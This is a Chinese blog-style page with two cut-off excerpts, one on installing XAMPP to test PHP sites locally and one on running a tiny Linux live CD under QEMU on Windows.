(7)

有时候我们在搭建网站的时候需要在本地调试网站,那么我们就需要搭建相应的搭建环境就以php程序而言就需要搭建apache环境和mysql数据库如果我们去下载mysql数据库的又是几百M,所以我们只需要用到一个很强大的工具XAMPPXAMPP软件集成包下载及使用说明：XAMPP（Apache+MySQL+PHP+PERL）是一款功能十分强大的建 XAMPP 软件站集成软件包。这个软件包原名字叫做LAMPP，但是为了避免误解，最新的几个版本就改名为 XAMPP 了。它可以在Windows、Linux、Solaris三种操作系统下安装使用支持多语言：英文、简体中文、繁体中文、韩文、俄文、日文等。很多人通过他们自己的经验认识到安装 Apache 服务器是件不容易的事儿。如果您想添加 MySQL、PHP 和 Perl，那就更难了。XAMPP 是一个易于安装且包含 MySQL、PHP 和 Perl 的 Apache 发行版。XAMPP 的确非常容易安装和使用：只需下载，解压缩，启动即可。下面我就具体给给大家具体介绍下使用方法首先我们去 下载XAMPP软件 这里是简体中文版的下载好以后：我们打开他进行安装输入Y然后 回车然后继续弹出以上代码继续输入y 一共3次。最好弹出命令输入1 然后一直回车 即刻安装完成安装完成以后就会自动打开XAMPP然后点击 Apahe后面的admin 就是打开了Apahe ...继续阅读 (11)

本软件包专门是为那些想尝试一下linux,但却不方便安装linux的朋友使用。本软件包不需要安装绝对绿色只要解压后，运行linux.bat这个文件就可以了。qume是一个虚拟机软件。dsl.iso是一个极其精减但又不缺乏应用的linux livecd映像。尽管这个操作系统软件包很小不能体现出linux操作系统极其强大的功能，但麻雀虽小五脏俱全，它是一个完整的操作系统。这也恰恰体现出在linux高效的特性，也绝对能让习惯windows的用户尝一下鲜。本软件包使用很方便，不用安装不用重启，而且可以在Windows 98/NT/2000/XP/2003使用起来也很方便，不用复杂的配置，只要运行里面的一个文件就可以了。、、、、、、、、、   ++++使用方法+++、、、、、、、、、、1 运行linux.bat这个文件，会弹出一个窗口，然后你按照窗口出现的英文提示操作便可。2 当你用鼠标操作这个虚拟机时，你会发现鼠标移不出虚拟机的窗口，没关系的只要你同时按下Ctrl+Alt就会把你的鼠标从虚拟机里放出来。3 如果你发现linux的桌面不能完全显示，请在linux桌面单击右键system–Xvesa，选择一个比你windows桌面小的分辨率，这样就可以看到一个完整的linux桌面了。4 如果你的linux不能上网，请根据你的实际情况作一下设置，在linux桌面单 ...继续阅读 (6)